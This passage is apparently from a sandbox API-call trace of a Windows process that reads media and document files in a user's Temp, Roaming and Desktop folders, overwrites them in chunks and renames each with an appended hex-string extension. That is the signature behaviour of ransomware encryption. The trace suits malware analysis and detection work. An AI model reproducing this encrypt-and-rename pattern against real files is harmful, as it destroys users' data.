ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.096] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf", lpString2=".8CCE04CAE5D5DBC78F1C0D13D27B07B7AA90774A38562D312FC6FC7E3F2F4B19" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf.8CCE04CAE5D5DBC78F1C0D13D27B07B7AA90774A38562D312FC6FC7E3F2F4B19") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8xCf.pdf.8CCE04CAE5D5DBC78F1C0D13D27B07B7AA90774A38562D312FC6FC7E3F2F4B19" [0122.096] GetProcessHeap () returned 0x600000 [0122.096] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x122) returned 0x32a0048 [0122.096] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x32a0048, Length=0x122, FileInformationClass=0xa) returned 0x0 [0122.097] CloseHandle (hObject=0x308) returned 1 [0122.098] GetProcessHeap () returned 0x600000 [0122.098] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.098] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.102] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.102] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.103] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.104] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv", lpString2=".25B0400719F0E3087F1F54BC88891F48EDB75F62E678D7ACA6F53B54CF9AA20F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv.25B0400719F0E3087F1F54BC88891F48EDB75F62E678D7ACA6F53B54CF9AA20F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\hflhrT6XYXvF6Wc3MMYO.flv.25B0400719F0E3087F1F54BC88891F48EDB75F62E678D7ACA6F53B54CF9AA20F" [0122.104] GetProcessHeap () returned 0x600000 [0122.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x140) returned 0x32a0178 [0122.104] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x32a0178, Length=0x140, FileInformationClass=0xa) returned 0x0 [0122.105] CloseHandle (hObject=0x308) returned 1 [0122.105] GetProcessHeap () returned 0x600000 [0122.105] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.106] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.111] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.111] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.112] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.113] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4", lpString2=".68EC535265A9217632C78D32DE3621CC26DA2F3E0E9E8C9CD528CEBE7E1C7678" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4.68EC535265A9217632C78D32DE3621CC26DA2F3E0E9E8C9CD528CEBE7E1C7678") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\HkG6V.mp4.68EC535265A9217632C78D32DE3621CC26DA2F3E0E9E8C9CD528CEBE7E1C7678" [0122.113] GetProcessHeap () returned 0x600000 [0122.113] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x122) returned 0x32a02c0 [0122.113] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x32a02c0, Length=0x122, FileInformationClass=0xa) returned 0x0 [0122.115] CloseHandle (hObject=0x308) returned 1 [0122.115] GetProcessHeap () returned 0x600000 [0122.115] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.115] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.118] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.118] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.118] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.119] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.131] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x6a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.133] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.147] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.148] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.155] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.156] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.162] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.163] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.173] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.174] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.186] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.187] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.199] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.200] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.206] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.207] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.217] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.217] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.224] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.224] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.258] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.259] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi", lpString2=".6F3785211264DDE3298BA6233629970CD204A55462A8616F66AB27C694DC2732" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi.6F3785211264DDE3298BA6233629970CD204A55462A8616F66AB27C694DC2732") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi.6F3785211264DDE3298BA6233629970CD204A55462A8616F66AB27C694DC2732" [0122.259] GetProcessHeap () returned 0x600000 [0122.259] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x6da2f0 [0122.259] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x6da2f0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0122.260] CloseHandle (hObject=0x308) returned 1 [0122.261] GetProcessHeap () returned 0x600000 [0122.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.261] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.280] ReadFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.281] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.281] WriteFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0122.283] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.572] ReadFile (in: hFile=0x30c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0122.573] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.575] WriteFile (in: hFile=0x308, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0122.597] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.598] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x27fff70) returned 0x0 [0122.598] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi", lpString2=".04BB02613B7882206F5F4CF68FC89E36B435C792399B2E71D85A3A59C652513B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi.04BB02613B7882206F5F4CF68FC89E36B435C792399B2E71D85A3A59C652513B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\2IJgy.avi.04BB02613B7882206F5F4CF68FC89E36B435C792399B2E71D85A3A59C652513B" [0122.598] GetProcessHeap () returned 0x600000 [0122.598] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11c) returned 0x62f8c8 [0122.598] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x27fff60, FileInformation=0x62f8c8, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0122.602] CloseHandle (hObject=0x30c) returned 1 [0122.603] GetProcessHeap () returned 0x600000 [0122.603] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0122.603] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.605] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.605] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi", lpString2=".BACF4789C5960FC1D46A3D76F147C2909384EB4397056BD5A70F73A9DA06C96D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi.BACF4789C5960FC1D46A3D76F147C2909384EB4397056BD5A70F73A9DA06C96D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-Ou_.avi.BACF4789C5960FC1D46A3D76F147C2909384EB4397056BD5A70F73A9DA06C96D" [0122.605] GetProcessHeap () returned 0x600000 [0122.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11a) returned 0x311bec0 [0122.606] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x27fff60, FileInformation=0x311bec0, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0122.607] CloseHandle (hObject=0x318) returned 1 [0122.608] GetProcessHeap () returned 0x600000 [0122.608] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.610] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.566] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0123.567] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png", lpString2=".A7F4DD69E11E7C0C799184133F474653F465E5789DFC09823A4EB536BEDA771E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png.A7F4DD69E11E7C0C799184133F474653F465E5789DFC09823A4EB536BEDA771E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\-cmSiqdrXi0V3j.png.A7F4DD69E11E7C0C799184133F474653F465E5789DFC09823A4EB536BEDA771E" [0123.567] GetProcessHeap () returned 0x600000 [0123.567] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x6f19f0 [0123.567] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x27fff60, FileInformation=0x6f19f0, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0123.568] CloseHandle (hObject=0x304) returned 1 [0123.568] GetProcessHeap () returned 0x600000 [0123.568] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.569] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.696] ReadFile (in: hFile=0x318, lpBuffer=0x32e9198, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c9060 | out: lpBuffer=0x32e9198*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c9060) returned 1 [0123.696] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.702] ReadFile (in: hFile=0x30c, lpBuffer=0x33112f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f11b8 | out: lpBuffer=0x33112f0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f11b8) returned 1 [0123.702] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.709] ReadFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0123.709] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.709] WriteFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0123.827] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.827] ReadFile (in: hFile=0x338, lpBuffer=0x33b61f0, nNumberOfBytesToRead=0x6e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x33960b8 | out: lpBuffer=0x33b61f0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x33960b8) returned 1 [0123.827] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.827] ReadFile (in: hFile=0x328, lpBuffer=0x33de348, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x33be210 | out: lpBuffer=0x33de348*, lpNumberOfBytesRead=0x0, lpOverlapped=0x33be210) returned 1 [0123.827] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.828] ReadFile (in: hFile=0x334, lpBuffer=0x34064a0, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x0, lpOverlapped=0x33e6368 | out: lpBuffer=0x34064a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x33e6368) returned 1 [0123.828] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.828] ReadFile (in: hFile=0x33c, lpBuffer=0x342e5f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x340e4c0 | out: lpBuffer=0x342e5f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x340e4c0) returned 1 [0123.828] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.828] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x27fff70) returned 0x0 [0123.829] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3", lpString2=".F91DB47548CA3D988FE301BA6B6139C1DE891D51B8660335E7F9C9D87BC9DE7F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3.F91DB47548CA3D988FE301BA6B6139C1DE891D51B8660335E7F9C9D87BC9DE7F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3.F91DB47548CA3D988FE301BA6B6139C1DE891D51B8660335E7F9C9D87BC9DE7F" [0123.829] GetProcessHeap () returned 0x600000 [0123.829] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x6f5a38 [0123.829] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x27fff60, FileInformation=0x6f5a38, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0123.879] CloseHandle (hObject=0x31c) returned 1 [0123.879] GetProcessHeap () returned 0x600000 [0123.879] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0123.880] 